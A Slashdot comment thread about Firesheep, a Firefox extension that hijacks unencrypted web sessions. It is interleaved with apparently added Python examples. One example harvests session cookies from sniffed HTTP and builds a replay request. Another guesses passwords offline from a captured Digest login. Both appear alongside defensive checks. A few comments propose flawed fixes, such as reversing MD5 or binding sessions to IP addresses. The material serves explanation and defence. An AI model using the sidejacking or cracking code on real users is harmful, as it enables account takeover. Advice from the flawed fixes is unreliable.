Firefox Extension Makes Social-Network ID Spoofing Trivial
Orome1 writes "A simple-to-use Firefox plugin presented yesterday at Toorcon in San Diego has hit the security world with the realization that squabbles about Facebook's changing privacy settings and various privacy breaches simply miss the point. 'When it comes to user privacy, SSL is the elephant in the room,' said Eric Butler, the developer of the extension in question, dubbed Firesheep. By installing and running it, anyone can 'sniff out' the unencrypted HTTP sessions currently allowing users on that network segment to access social networks, online services and other websites requiring a login, and simply hijack them and impersonate the user."
I don't dispute the author's work or goals (I've been using SSH tunneling on public WiFi for years to prevent just this), but he should have mentioned that clicking on information you gathered (and logging in as another user without their consent) is very likely against federal law in the US (and likely in most other locations). Just gathering this information can likely be argued to be illegal as well (wiretapping?).
So be careful where you click.
Ha ha, anon is pwned :D
here: http://codebutler.com/firesheep
They apparently call it "sidejacking", i.e. sniffing other users' cookies from a WiFi and using them. Not new, but made user-friendly.
NB: The message above might reflect my opinion right now, but not necessarily tomorrow or next year.
Someone on the same network sniffing your unencrypted traffic is Facebook's fault? Or the fact that someone made a UI to do it for dummies?
What is the CPU use and heat of the user base requesting and using SSL vs. this bad news?
"Double-click on someone, and you're instantly logged in as them."
What's the extra use, 15-20%, vs. unencrypted HTTP?
Would SSL being left off allow creative law enforcement uses?
Domestic spying is now "Benign Information Gathering"
Plugin-rebuttal.
What permissions do you need for this? Do you have to be the owner of the network in order to sniff things out in this manner? Or is it possible for me to steal accounts off a public network?
If it's the former, then there's nothing too special - sniffers can do that already.
If it's the latter, then it's time to put on the tinfoil hats.
Another point does not "miss the point".
Transport security != corporate marketing of private data
"You have liberated me from thought."
I used to do sniffing and stuff like this a couple of years ago, and the biggest hurdle was finding a wireless adapter which would allow promiscuous mode. aircrack sells one that comes with first-party drivers to allow sniffing. I used a Linksys USB adapter since there were third-party drivers that allowed it.
Unless something has changed, I thought most wireless drivers didn't support promiscuous mode for sniffing.
The article is extremely light on details. The plugin's page doesn't tell much either. I'm curious how it captures the WiFi packets. Is it possible to capture them when not in monitor mode?
the realization that squabbles about Facebook's changing privacy settings and various privacy breaches simply miss the point.
I'm much more concerned about that than someone on my network stealing my password. If they're on my network, they could steal my password? This is not new, nor is it news. The number of people on the internet out to get your personal information is much, much higher than the number of people on your network out to do the same.
This is just a high-tech version of this:
'When it comes to user privacy, other people are the elephant in the room,' said SudoGhost, random douchebag author of the post in question, dubbed 'Other People in the Room'. By being in the room and watching the screen/keyboard, anyone can 'sniff out' not only the unencrypted HTTP sessions, but virtually any keystroke, allowing your mom to access social networks, online services and other websites requiring a login, and simply hijack them and find out where you really were Saturday night."
... that the bleating masses who so readily rushed to put their entire lives and details on social networking sites despite all the warnings are now running around shouting at all the chickens that are coming home to roost?
For the rest of us with some common sense this is just hilarious.
Kudos to Facebook and most other networks for NOT using encryption for anything but the login, making such hacks possible!
I know that HTTPS would put some stress on the servers, especially with something as big as Facebook.
But, come on. Social networks have become so important for some people that the risks of vandalism/identity spoofing/defamation, etc. are significant and would benefit from some more protection.
"Sufficiently advanced satire is indistinguishable from reality." - [Tips: 1DrYakQDKCQ6y52z6QbnkxHXAocMZJE61o ]
It's "just" WiFi cookie theft. You can do that easily with wireshark and copy/paste, this just makes it a bit faster. The problem lies in session cookies, and this is a problem known for what, almost a decade now?
Emotions! In your brain!
The news is that still hardly anyone understands SSL or what it is for.
People like to see that little lock sign (or whatever obscure message their browser displays) when they log into their bank. But I sincerely doubt that the great majority of people have any idea that things like e-mail transactions can be routed over SSL or why that might be a good (i.e., critically important) idea.
Just scan your local neighborhood and look at (for an analogous example) how many people are still using WEP and thinking that somehow they are protecting themselves.
It is the lack of SSL that is the problem here, and it is the non-use of SSL that 'is the elephant in the room.'
This has been going on for a long time now - attend a NANOG meeting and use unencrypted logins, and you may well see your password on the screen by the end of the meeting - the white hat guys routinely sniff the wireless for passwords.
Public WiFi isn't secure. In other Slashdot news, water is wet and fire burns. Really though, the next step in this equation is for someone to run this at a really busy hotspot in NYC, and then to anonymously publish the results online. Bang! media coverage. Bang! reputation loss and user defection for compromised services. Bang! solution for problem gains financial incentive, and gets fixed.
What is the problem? Protect your WiFi connection with WPA2 and this hack does not work. All around me almost any network is protected and these are regular folks, not some security gurus. Yes, their information may be stolen further down the wire, but this is not new. While I am all for SSL protection, this particular hack can be fought off by individual users. Even more, while HTTPS has to protect each individual site you go to, WPA2 creates a secure wireless tunnel that protects all your communications. Move along, nothing to see here :-).
Run (on) Linux? Apparently not. I guess I won't be using it.
It seems that this is most concerning for those logging in while using public networks (such as accessing with a cafe's WiFi).
So this leads me to ask if I am safer when using the Facebook/Amazon/eBay app rather than the mobile browser. Is the security of the iPhone or android apps better than the web security for Facebook?
Or can I make my access of these sites more secure myself somehow?
If this were really happening, what would you think?
Leaving aside MD5 cracks (use another algo if you want):
MD5 the password with JavaScript on the client end before sending it. Then un-MD5 it with PHP on the server.
Plenty of security-conscious CMSes have been doing this since before Mark Z even thought of an electronic facebook.
I'm not a lawyer, but I play one on the Internet.
Someone, who obviously must have sniffed out my wireless cookies. -Shame on them.
I know you wouldn't be arrogant enough to try to invent your own encryption algorithm, so don't be dumb enough to try to invent your own authentication protocol.
Follow Microsoft and steal it from the best: http://web.mit.edu/Kerberos/#what_is
Invented by the professors at MIT to secure their own logins from the students at MIT. A.k.a. "forged in the fires of Mount Doom" and so safe from most threats.
I really miss the good old days, when talks at security conferences would blow you away, and people would actually talk about new security-related things, rather than showing the 76th way of automating a process/procedure that has been known for 10 years (always involving grabbing [flavor of the month service]'s password).
Oh well, guess people were in security world for different reasons 10 years ago...
Where are the guys who keep saying that sending out unencrypted packets is the users' fault?
Hey, you should know your connection to Facebook is not encrypted, so anyone sniffing your packets is your own fault.
Oh, this rule only applies when otherwise Google would be blamed? My bad.
This needs to be heard by everyone. NOW. Sure, your New York Times access is largely trivial, but Facebook and gmail access? That's someone's life. Amazon, and soon Netflix, PayPal, and eBay? That's someone's money. Maybe once people start losing money and their jobs websites will realize the severity of security, as that's usually when it hits home. But until then, very neat.
Protect yourself: https://addons.mozilla.org/en-US/firefox/addon/12714/
I live in constant fear of the Coming of the Red Spiders.
This is why I use this Chrome extension - https://chrome.google.com/extensions/detail/flcpelgcagfhfoegekianiofphddckof
Basically, for any site you go to, it AUTOMATICALLY redirects you to the SSL version of that site if it exists, including ssl.facebook.com.
Yes ssl.facebook.com should be the default, as should most sites, but until they are this extension is invaluable IMO.
I get so irritated with the gaming of eBay's system. It wasn't until I put up a nice guitar that I learned if you want to get a good deal on something, bid as a brand-new user. What was happening was some brand-new user was bidding on my auction in the smallest increments allowed. This made it look like the auction was being bid up by me, so probably a lot of eBay regulars didn't want to bid because of this douche. I didn't really notice or understand what was happening until the douche won the auction at a price that was hundreds below where the guitar should have sold. And I'm too effing moral to do the other eBay game I hate which is when a seller cancels an auction simply because the price is too low. I've had that happen on a number of occasions where it was very clear I was going to get a sweet deal on an auction and seller suddenly cancels. Of course, you place a bid and there's no fucking way to get out of it without getting permission from the seller, but if you're a seller you can get out of the auction any damn time you please.
When I am using public WiFi, I tend to SSH-tunnel to my proxy at home for web browsing.
It usually makes for a better browsing experience too, because DNS on public WiFi usually sucks and the compression over SSH means that most web pages load quicker.
No sig. Move along - nothing to see here.
Many of my "personalities" love this: The Professor is eager to learn who is twittering about his cheap hairpiece rather than taking notes on the lecture. Gods-gift-to-women wants to learn the name of the cutie updating facebook in the coffee shop. We're going to have great fun! (Of course, this also means no more nefarious activities on the wifi in my therapist's waiting room. She's concluded some of us are paranoid.)
I can't wait for 4chan to get their shit-disturbing hands on this.
Although I'm not holding my breath for IPv6 to be widely adopted any time soon, the fact that encryption is mandated in the protocol as an option is something that is long overdue. Clear-text, non-encrypted network traffic is something everybody should avoid if possible (which is REALLY hard without a lot of work).
Maybe if encryption was mandated in packets, sniffing this sort of stuff would not be an issue? (yes)
Thank you for putting a nice jacking extension for Firefox in the hands of Joe User and his ten-times-a-day script kiddie son. Sure, unencrypted HTTP is crap security, and it has been for ages. But the web won't go all-SSL overnight as a result of your ingenious little idea. And in the meantime you'll have caused a lot of misery with your shitty-ass cracking toy.
This should be easy to block on the server side without using SSL. Just save the IP address in the session when you first assign the session ID, and then check the IP each time the session ID is used. I haven't had a chance to test it yet, but I put the code up here: http://filebottle.com/FireSheepBlock.html
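The IP-binding check described in the comment above, written out as an added example (this is not the poster's FireSheepBlock code). The addresses are constructed, and the scenario assumes what the thread is actually worried about: the victim and the sniffer are on the same hotspot, so the server sees both of them behind one NAT address. The third request comes from a different network.

```python
"""Added example, not the poster's FireSheepBlock code: bind a session to the peer
address it was issued to and re-check it on every request. Addresses are constructed;
the scenario assumes victim and attacker share one NAT'd hotspot."""
import secrets


class SessionStore:
    def __init__(self):
        self.sessions = {}          # sid -> {"user": ..., "ip": ...}

    def issue(self, user, client_ip):
        """Called at login: remember which peer address the new session ID was given to."""
        sid = secrets.token_hex(16)
        self.sessions[sid] = {"user": user, "ip": client_ip}
        return sid

    def authenticate(self, sid, client_ip):
        """Return the user for this cookie, or None if it is unknown or presented
        from a different peer address than the one it was issued to."""
        rec = self.sessions.get(sid)
        if rec is None or rec["ip"] != client_ip:
            return None
        return rec["user"]


def handle(store, request):
    """Minimal dispatcher: a request is a dict with the peer address and Cookie header."""
    cookie_header = request.get("cookie", "")
    cookies = dict(p.strip().split("=", 1) for p in cookie_header.split(";") if "=" in p)
    return store.authenticate(cookies.get("sid", ""), request["peer_ip"])


def scenario():
    """(victim, attacker on the same Wi-Fi, attacker elsewhere) -> who the server thinks they are."""
    store = SessionStore()
    hotspot_nat = "203.0.113.7"                 # constructed: the cafe router's public address
    sid = store.issue("alice", hotspot_nat)     # alice logged in from the cafe
    victim = {"peer_ip": hotspot_nat, "cookie": f"sid={sid}; theme=dark"}
    # The sniffed cookie replayed from the same hotspot arrives from the same NAT address,
    # so the check cannot tell it apart from the victim; from another network it is refused.
    same_wifi_attacker = {"peer_ip": hotspot_nat, "cookie": f"sid={sid}"}
    remote_attacker = {"peer_ip": "198.51.100.9", "cookie": f"sid={sid}"}
    return (handle(store, victim), handle(store, same_wifi_attacker), handle(store, remote_attacker))


if __name__ == "__main__":
    print(scenario())   # ('alice', 'alice', None)
```

The check does stop a cookie carried off to a different network, but the sidejacker the thread describes sits on the same Wi-Fi as the victim and shares the hotspot's outbound address, so the server accepts the replay. It also logs out legitimate users whose address changes (a phone moving from Wi-Fi to 3G), which is why binding to the client address is at best a supplement to sending the session cookie only over HTTPS.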
Speaking as seebs, who I actually am, I think this addon is a brilliant example of the importance of making a threat concrete and specific in order for people to understand it. I, for one, welcome our new us overlords.
Consider:
http://www.csd.uwo.ca/staff/magi/personal/humour/Computer_Folklore/Robin%20Hood%20And%20Friar%20Tuck.html
This is not a new technique. This is not a bad thing, particularly. And compared to the severity of the problem, I think it's pretty tastefully understated.
And again, this is actually seebs. Really!
My blog: http://www.seebs.net/log/ --- My iPhone/iPad app: http://www.seebs.net/seebsfrac/
I work for a web design Brisbane company called Kintek. Interesting, however it still uses WinPcap, which means it's actually sniffing the LAN packets or ARP poisoning to see other users' insecure data, correct? Most websites don't redirect you to HTTPS before asking you to log in, which basically means your login details are sent insecurely over the LAN before they get to the Internet.
There's a cool tool which lets you see all this already, called Cain and Abel: http://www.oxid.it/cain.html
Using ARP poisoning you can actually man-in-the-middle anyone on a LAN unless they use HTTPS or anti-ARP-poisoning tools.
The real security threat will probably come down to sniffing mobile phone 3G data, and I wonder what's possible in that realm. If you can send it you can receive it, and I doubt it's encrypted well enough to prevent reading, especially when the police want the ability to pick messages out of the air, a la The Wire. :)
If we used digest authentication for logins, then we wouldn't have to bother with cookies at all.
Unless there are any HTTP authentication mechanisms that prevent session hijacking from sniffers, you'll still need HTTPS.
Highlighted for you. Digest authentication is replay-resistant and MITM-resistant (but not spoof-resistant), because the exchanged data changes at each request:
- at each request, the web server sends a different salt, and tests whether the hash of the salt + hashed password corresponds to what it predicted.
You should try Facebook sometime; I bet you're loads of fun at a party.
Breakfast served all day!
The OP worded it badly.
What they meant is that most CMSes store the password in the database as an MD5 (or some other algorithm) hash. The technique he's describing is to hash the password client-side and send the MD5 over the wire to the server, which can then compare it to what's stored in the database to grant access.
Still, while better than nothing, there are a few problems with this, including:
While there are ways around it, really, the simplest thing to do is simply use SSL for secure connections. Truth is, the smartest thing to do is use combinations of all of the above, because even SSL isn't guaranteed to be secure if you don't have absolute control over the hardware you are browsing on.
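An added example covering both the client-side MD5 idea discussed just above and the digest-authentication exchange described earlier in the thread; it is not code from any CMS, from the thread, or from a real Digest implementation. Scheme 1 hashes the password in the client and lets the server compare it with the stored hash (the server cannot "un-MD5" anything, it only compares). Scheme 2 follows the RFC 2617 `auth` formula with a per-request server nonce. The realm, the user "alice", the password "hunter2", the nonces and the candidate list are all constructed, and treating each nonce as single-use (no nonce-count window) is a simplification.

```python
"""Added example (not from the thread, a CMS or a real Digest library): why a static
client-side MD5 is a reusable credential, while a Digest-style challenge/response is
not replayable, and what a sniffer can still do with the Digest exchange.
Users, passwords, realm, nonces and the candidate list below are constructed."""
import hashlib
import secrets


def md5hex(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()


# --- Scheme 1: client sends md5(password); server compares with its stored md5 -------
class StaticHashServer:
    def __init__(self, users):
        self.users = users                  # {user: md5(password)}, as a CMS database stores it

    def login(self, user, client_hash):
        return self.users.get(user) == client_hash


def static_scheme_is_replayable():
    srv = StaticHashServer({"alice": md5hex("hunter2")})
    sniffed_hash = md5hex("hunter2")        # exactly the bytes that crossed the wire
    return srv.login("alice", sniffed_hash) # True: the hash now *is* the password


# --- Scheme 2: Digest-style challenge/response (RFC 2617 'auth' formula) -------------
REALM = "example-realm"                     # constructed


def digest_response(ha1, method, uri, nonce, nc, cnonce):
    ha2 = md5hex(f"{method}:{uri}")
    return md5hex(f"{ha1}:{nonce}:{nc}:{cnonce}:auth:{ha2}")


class DigestServer:
    def __init__(self, users):
        self.users = users                  # {user: HA1 = md5(user:realm:password)}
        self.live_nonces = set()

    def challenge(self):
        nonce = secrets.token_hex(8)        # fresh per request; single-use is a simplification
        self.live_nonces.add(nonce)
        return nonce

    def verify(self, user, method, uri, nonce, nc, cnonce, response):
        if nonce not in self.live_nonces or user not in self.users:
            return False                    # unknown, expired or already-consumed nonce
        self.live_nonces.discard(nonce)     # consume it, so replaying this exchange fails
        return digest_response(self.users[user], method, uri, nonce, nc, cnonce) == response


def digest_client(user, password, method, uri, nonce, cnonce, nc="00000001"):
    ha1 = md5hex(f"{user}:{REALM}:{password}")
    return digest_response(ha1, method, uri, nonce, nc, cnonce)


def digest_scheme_replay():
    """(genuine login, same exchange replayed, old response under a new nonce)."""
    srv = DigestServer({"alice": md5hex(f"alice:{REALM}:hunter2")})
    nonce, cnonce, nc = srv.challenge(), "c0ffee", "00000001"
    resp = digest_client("alice", "hunter2", "GET", "/inbox", nonce, cnonce, nc)
    genuine = srv.verify("alice", "GET", "/inbox", nonce, nc, cnonce, resp)
    replayed = srv.verify("alice", "GET", "/inbox", nonce, nc, cnonce, resp)
    new_nonce = srv.challenge()
    stale = srv.verify("alice", "GET", "/inbox", new_nonce, nc, cnonce, resp)
    return genuine, replayed, stale         # (True, False, False)


def offline_guess(sniffed, candidates):
    """What the sniffer can still do: every input except the password is on the wire,
    so a captured (nonce, cnonce, response) triple is an offline cracking target."""
    for pw in candidates:
        ha1 = md5hex(f"{sniffed['user']}:{REALM}:{pw}")
        if digest_response(ha1, sniffed["method"], sniffed["uri"], sniffed["nonce"],
                           sniffed["nc"], sniffed["cnonce"]) == sniffed["response"]:
            return pw
    return None


def digest_offline_crack():
    nonce, cnonce, nc = "deadbeef01020304", "c0ffee", "00000001"   # constructed capture
    resp = digest_client("alice", "hunter2", "GET", "/inbox", nonce, cnonce, nc)
    sniffed = {"user": "alice", "method": "GET", "uri": "/inbox",
               "nonce": nonce, "cnonce": cnonce, "nc": nc, "response": resp}
    return offline_guess(sniffed, ["password", "letmein", "hunter2", "qwerty"])


if __name__ == "__main__":
    print(static_scheme_is_replayable(), digest_scheme_replay(), digest_offline_crack())
```

Two things worth noticing. The Digest server stores HA1, which is itself enough to impersonate the user if the database leaks, so neither scheme removes the need to protect the credential store. And Digest only protects the login exchange: whatever the server hands out afterwards to keep the user logged in is the thing a sidejacker takes, which is the argument for HTTPS on every request rather than a cleverer login.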
I submitted an article on using Ubuntu and NX NoMachine at home to prevent exactly this type of attack. No one commented: http://slashdot.org/submission/1365444/A-personal-private-cloud-server
This technique is called "sidejacking". It works by piggy-backing a user's cookies. I've seen programs and setups to do it before but I wouldn't have imagined that a Firefox addon would be made to do it. This addon is very thorough, a sweet tool for wardrivers.
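The "sidejacking" that several commenters describe (sniff the session cookie, replay it) comes down to a few lines of header parsing once the packets are in hand. The following is an added example, not Firesheep's code: it takes reassembled clear-text HTTP requests, picks out the cookies that carry a login session for known hosts, and builds the replay request. It also includes the server-side check that matters in the other direction, which is whether a `Set-Cookie` line carries the `Secure` attribute. The hosts, cookie names, captured requests and login response are all constructed.

```python
"""Added example, not Firesheep's code: the parsing core of cookie sidejacking, plus
the Set-Cookie audit a site owner would run. Hosts, cookie names and the captured
HTTP below are constructed for the demo."""
from collections import defaultdict

# Which cookie names carry the login session on each site. Constructed table; a real
# tool would carry one such entry per supported service.
SESSION_COOKIES = {
    "www.example-social.test": {"sid", "auth"},
    "mail.example.test": {"SESSIONID"},
}


def parse_http_request(raw: bytes):
    """Split one reassembled clear-text HTTP request into (method, path, headers)."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    request_line, *header_lines = head.split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers


def parse_cookie_header(value: str):
    cookies = {}
    for part in value.split(";"):
        name, sep, val = part.strip().partition("=")
        if sep:
            cookies[name] = val
    return cookies


def harvest_sessions(captured_requests):
    """{host: {cookie: value}} for every session cookie that went past in the clear.
    Non-session cookies (theme, tracking) are ignored; unknown hosts are skipped."""
    sessions = defaultdict(dict)
    for raw in captured_requests:
        _, _, headers = parse_http_request(raw)
        host = headers.get("host")
        if host not in SESSION_COOKIES or "cookie" not in headers:
            continue
        cookies = parse_cookie_header(headers["cookie"])
        for name in SESSION_COOKIES[host]:
            if name in cookies:
                sessions[host][name] = cookies[name]
    return dict(sessions)


def build_replay_request(host, cookies, path="/"):
    """The 'double-click' step: present the victim's cookies as if they were ours."""
    cookie_header = "; ".join(f"{k}={v}" for k, v in sorted(cookies.items()))
    return f"GET {path} HTTP/1.1\r\nHost: {host}\r\nCookie: {cookie_header}\r\n\r\n".encode()


def cookies_without_secure(raw_response: bytes):
    """Server-side check: names of cookies set without the Secure attribute. A browser
    sends those over plain HTTP as well, which is what makes the harvest above possible.
    HttpOnly does not help here; it only hides the cookie from page scripts."""
    head = raw_response.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    weak = []
    for line in head.split("\r\n")[1:]:
        name, _, value = line.partition(":")
        if name.strip().lower() != "set-cookie":
            continue
        attrs = [a.strip() for a in value.split(";")]
        cookie_name = attrs[0].partition("=")[0].strip()
        if not any(a.lower() == "secure" for a in attrs[1:]):
            weak.append(cookie_name)
    return weak


# Constructed sample capture: three requests as a sniffer on the same Wi-Fi would see them.
CAPTURE = [
    b"GET /home HTTP/1.1\r\nHost: www.example-social.test\r\n"
    b"Cookie: sid=abc123; theme=dark; auth=tok9\r\n\r\n",
    b"GET /logo.png HTTP/1.1\r\nHost: cdn.example.test\r\nCookie: tracking=xyz\r\n\r\n",
    b"POST /inbox HTTP/1.1\r\nHost: mail.example.test\r\nContent-Length: 0\r\n"
    b"Cookie: SESSIONID=99ff\r\n\r\n",
]

# Constructed login response: one cookie set without Secure, one with it.
LOGIN_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Set-Cookie: sid=abc123; Path=/; HttpOnly\r\n"
    b"Set-Cookie: csrf=q1w2; Path=/; Secure\r\n"
    b"Content-Length: 0\r\n\r\n"
)

if __name__ == "__main__":
    for host, cookies in harvest_sessions(CAPTURE).items():
        print(host, build_replay_request(host, cookies))
    print("sent over plain HTTP:", cookies_without_secure(LOGIN_RESPONSE))
```

Capturing the packets (the promiscuous or monitor-mode question raised earlier in the thread) is a separate problem this example does not touch; it starts from already-reassembled requests. The audit function is the useful half for a site owner: a session cookie that a browser will attach to a plain-HTTP request, even a request for an image, is a session the sniffer gets for free, and the fix is to set it with `Secure` and serve the site over HTTPS so that such a request never happens.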